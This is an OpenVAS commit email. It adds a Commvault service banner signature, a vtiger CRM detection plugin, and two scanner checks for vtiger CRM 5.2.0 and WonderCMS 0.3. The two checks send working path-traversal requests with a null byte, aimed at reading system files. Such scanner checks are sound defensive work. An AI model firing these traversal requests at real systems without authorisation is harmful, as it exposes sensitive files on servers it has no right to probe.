[Openvas-commits] r9440 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Thu Nov 18 13:10:52 CET 2010


Author: mime
Date: 2010-11-18 13:10:44 +0100 (Thu, 18 Nov 2010)
New Revision: 9440

Added:
   trunk/openvas-plugins/scripts/gb_vtiger_crm_44901.nasl
   trunk/openvas-plugins/scripts/gb_vtiger_crm_detect.nasl
   trunk/openvas-plugins/scripts/gb_wondercms_44916.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/find_service2.nasl
Log:
Added new plugins. Added "Commvault Client Event Manager" banner, submitted by Brian Clark.

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2010-11-18 10:25:42 UTC (rev 9439)
+++ trunk/openvas-plugins/ChangeLog	2010-11-18 12:10:44 UTC (rev 9440)
@@ -1,3 +1,14 @@
+2010-11-18  Michael Meyer <michael.meyer at greenbone.net>
+
+	* scripts/gb_wondercms_44916.nasl,
+	scripts/gb_vtiger_crm_44901.nasl,
+	scripts/gb_vtiger_crm_detect.nasl:
+	Added new plugins.
+
+	* scripts/find_service2.nasl:
+	Added "Commvault Client Event Manager" banner, submitted by
+	Brian Clark.
+
 2010-11-18  Chandrashekhar B <bchandra at secpod.com>
 
 	* scripts/gb_google_chrome_mult_vuln_nov10_win.nasl,

Modified: trunk/openvas-plugins/scripts/find_service2.nasl
===================================================================
--- trunk/openvas-plugins/scripts/find_service2.nasl	2010-11-18 10:25:42 UTC (rev 9439)
+++ trunk/openvas-plugins/scripts/find_service2.nasl	2010-11-18 12:10:44 UTC (rev 9440)
@@ -121,6 +121,35 @@
 
 }
 
+# 0x00:  00 00 00 09 00 00 00 80 00 00 00 00 00 00 00 00    ................
+# 0x10:  00 00 04 32 00 00 00 01 00 00 09 5F 00 00 00 68    ...2......._...h
+# 0x20:  7A 29 57 2D 38 23 50 52 20 27 2E 57 35 5F 47 6A    z)W-8#PR '.W5_Gj
+# 0x30:  7D 25 39 65 37 2E 79 56 6E 67 4D 5E 4F 3E 3B 57    }%9e7.yVngM^O>;W
+# 0x40:  78 44 21 3A 32 32 27 7F 61 4A 31 65 59 3F 7A 75    xD!:22'.aJ1eY?zu
+# 0x50:  33 38 5D 43 40 30 55 74 7D 62 28 26 48 43 60 6C    38]C at 0Ut}b(&HC`l
+# 0x60:  51 70 5A 39 74 4A 42 40 47 7F 3F 39 2F 4B 2A 26    QpZ9tJB at G.?9/K*&
+# 0x70:  38 5F 25 36 65 20 6A 6A 44 33 61 37 25 78 56 2B    8_%6e jjD3a7%xV+
+# 0x80:  2D 54 4A 33 00 00 00 00                            -TJ3....
+# http://www.commvault.com/products-backup-recovery.html
+# # submitted by Brian Clark <bclark at Omeda.com> 17.11.10
+
+if(raw_string(
+0x00,0x00,0x00,0x09,0x00,0x00,0x00,0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+0x00,0x00,0x04,0x32,0x00,0x00,0x00,0x01,0x00,0x00,0x09,0x5F,0x00,0x00,0x00,0x68,
+0x7A,0x29,0x57,0x2D,0x38,0x23,0x50,0x52,0x20,0x27,0x2E,0x57,0x35,0x5F,0x47,0x6A,
+0x7D,0x25,0x39,0x65,0x37,0x2E,0x79,0x56,0x6E,0x67,0x4D,0x5E,0x4F,0x3E,0x3B,0x57,
+0x78,0x44,0x21,0x3A,0x32,0x32,0x27,0x7F,0x61,0x4A,0x31,0x65,0x59,0x3F,0x7A,0x75,
+0x33,0x38,0x5D,0x43,0x40,0x30,0x55,0x74,0x7D,0x62,0x28,0x26,0x48,0x43,0x60,0x6C,
+0x51,0x70,0x5A,0x39,0x74,0x4A,0x42,0x40,0x47,0x7F,0x3F,0x39,0x2F,0x4B,0x2A,0x26,
+0x38,0x5F,0x25,0x36,0x65,0x20,0x6A,0x6A,0x44,0x33,0x61,0x37,0x25,0x78,0x56,0x2B,
+0x2D,0x54,0x4A,0x33,0x00,0x00,0x00,0x00) >< buf && port == 8402) {
+
+  register_service(port:port, proto:"commvault_client_event_manager");
+  security_note(port:port, data:"The Commvault Client Event Manager service is running on this port");
+  exit(0);
+
+}
+
 # [root at f00dikator new_nasl_mods]# telnet 10.10.10.7 7110
 # Trying 10.10.10.7...
 # Connected to 10.10.10.7.
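Review bot: The raw_string() comparison in the new Commvault block matches all 136 captured bytes, including the 104 printable characters that follow the length word `0x68` (offsets 0x20-0x87), and that run looks like a per-host or per-session token rather than a protocol constant, so the signature will likely only ever fire on the machine the banner was captured from. Unless a second installation confirms those bytes are fixed, match only the leading header and test the cheap port condition first: `if(port == 8402 && raw_string(0x00,0x00,0x00,0x09,0x00,0x00,0x00,0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00) >< buf) {`. A comment recording what is known to be constant, e.g. `# only the leading header bytes are matched; the 104-byte printable payload appears to be per-host`, would stop a later maintainer from re-adding the full blob. The doubled `# #` in the "submitted by" comment is presumably a paste artefact.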

Added: trunk/openvas-plugins/scripts/gb_vtiger_crm_44901.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_vtiger_crm_44901.nasl	2010-11-18 10:25:42 UTC (rev 9439)
+++ trunk/openvas-plugins/scripts/gb_vtiger_crm_44901.nasl	2010-11-18 12:10:44 UTC (rev 9440)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Vtiger CRM Multiple Remote Security Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100910);
+ script_bugtraq_id(44901);
+ script_version ("1.0-$Revision$");
+
+ script_name("Vtiger CRM Multiple Remote Security Vulnerabilities");
+
+desc = "Overview:
+Vtiger CRM is prone to an arbitrary-file-upload vulnerability,
+multiple local file-include vulnerabilities, and multiple cross-site
+scripting vulnerabilities because the application fails to
+sufficiently sanitize user-supplied input.
+
+Attackers can exploit these issues to upload and execute arbitrary
+code in the context of the webserver process, view and execute
+arbitrary local files within the context of the webserver process,
+steal cookie-based authentication information, execute arbitrary client-
+side scripts in the context of the browser, and obtain sensitive
+information. Other attacks are also possible.
+
+Vtiger CRM 5.2.0 is vulnerable; other versions may also be affected.
+
+References:
+https://www.securityfocus.com/bid/44901
+http://www.vtiger.com/index.php
+http://www.ush.it/team/ush/hack-vtigercrm_520/vtigercrm_520.txt";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if Vtiger CRM is prone to a local file-include vulnerability");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("gb_vtiger_crm_detect.nasl","os_fingerprint.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+if(!dir = get_dir_from_kb(port:port,app:"vtiger_crm"))exit(0);
+
+os = get_kb_item("Host/OS/ICMP");
+files = traversal_files(os);
+
+foreach file (keys(files)) {
+   
+  url = string(dir, "/phprint.php?lang_crm=",crap(data:"../",length:3*9),files[file],"%00&module=a&action=a&activity_mode="); 
+
+  if(http_vuln_check(port:port, url:url,pattern:file)) {
+     
+    security_warning(port:port);
+    exit(0);
+
+  }
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_vtiger_crm_44901.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_vtiger_crm_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_vtiger_crm_detect.nasl	2010-11-18 10:25:42 UTC (rev 9439)
+++ trunk/openvas-plugins/scripts/gb_vtiger_crm_detect.nasl	2010-11-18 12:10:44 UTC (rev 9440)
@@ -0,0 +1,117 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# vtiger CRM Detection
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+# need desc here to modify it later in script.
+desc = "Overview:
+This host is running vtiger CRM, a web based, platform independant,
+modularly designed Open Source Customer Relationship Management
+(CRM) Software. 
+
+See also:
+http://www.vtiger.com";
+
+if (description)
+{
+ 
+ script_tag(name:"risk_factor", value:"None");
+ script_id(100909);
+ script_version ("1.0-$Revision$");
+
+ script_name("vtiger CRM Detection");
+ script_description(desc);
+ script_summary("Checks for the presence of vtiger CRM");
+ script_category(ACT_GATHER_INFO);
+ script_family("Service detection");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+
+port = get_http_port(default:80);
+
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/vtigercrm",cgi_dirs());
+
+foreach dir (dirs) {
+
+ url = string(dir, "/index.php");
+ req = http_get(item:url, port:port);
+ buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
+ if( buf == NULL )continue;
+
+ if("<title>vtiger CRM" >< buf && "login_language" >< buf)
+ {
+     if(strlen(dir)>0) {
+        install=dir;
+     } else {
+        install=string("/");
+     }
+
+    vers = string("unknown");
+    ### try to get version 
+    version = eregmatch(string: buf, pattern: "vtiger CRM ([0-9.]+)[^ ]",icase:TRUE);
+
+    if ( !isnull(version[1]) ) {
+       vers=chomp(version[1]);
+    }
+
+    set_kb_item(name: string("www/", port, "/vtiger_crm"), value: string(vers," under ",install));
+
+    if(vers == "unknown") {
+      set_kb_item(name:string("cpe:/a:vtiger:vtiger_crm"),value:TRUE);
+    } else {
+      set_kb_item(name:string("cpe:/a:vtiger:vtiger_crm:",vers),value:TRUE);
+    }  
+
+    info = string("com\n\nvtiger CRM Version '");
+    info += string(vers);
+    info += string("' was detected on the remote host in the following directory(s):\n\n");
+    info += string(install, "\n");
+
+    desc = ereg_replace(
+        string:desc,
+        pattern:"com$",
+        replace:info
+    );
+
+       if(report_verbosity > 0) {
+         security_note(port:port,data:desc);
+       }
+       exit(0);
+
+ }
+}
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_vtiger_crm_detect.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/gb_wondercms_44916.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_wondercms_44916.nasl	2010-11-18 10:25:42 UTC (rev 9439)
+++ trunk/openvas-plugins/scripts/gb_wondercms_44916.nasl	2010-11-18 12:10:44 UTC (rev 9440)
@@ -0,0 +1,95 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# WonderCMS 'page' Parameter Cross Site Scripting And Information Disclosure Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100908);
+ script_bugtraq_id(44916);
+ script_version ("1.0-$Revision$");
+
+ script_name("WonderCMS 'page' Parameter Cross Site Scripting And Information Disclosure Vulnerabilities");
+
+desc = "Overview:
+WonderCMS is prone to a cross-site scripting vulnerability and an information-
+disclosure vulnerability because it fails to properly sanitize user-
+supplied input.
+
+An attacker may leverage these issues to obtain potentially sensitive
+information and to execute arbitrary script code in the browser of an
+unsuspecting user in the context of the affected site. This may allow
+the attacker to steal cookie-based authentication credentials and to
+launch other attacks.
+
+WonderCMS 0.3 is vulnerable; other versions may also be affected.
+
+Solution:
+Vendor patch is available. Please see the reference for more details.
+
+References:
+https://www.securityfocus.com/bid/44916
+http://krneky.com/en/wondercms";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_description(desc);
+ script_summary("Determine if installed WonderCMS is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl","os_fingerprint.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+if(!can_host_php(port:port))exit(0);
+
+os = get_kb_item("Host/OS/ICMP");
+
+dirs = make_list("/cms","/wondercms",cgi_dirs());
+files = traversal_files(os);
+
+foreach dir (dirs) {
+  foreach file (keys(files)) {
+   
+    url = string(dir, "/index.php?page=",crap(data:"../",length:3*9),files[file],"%00"); 
+
+    if(http_vuln_check(port:port, url:url,pattern:file)) {
+     
+      security_warning(port:port);
+      exit(0);
+
+    }
+  }
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_wondercms_44916.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision


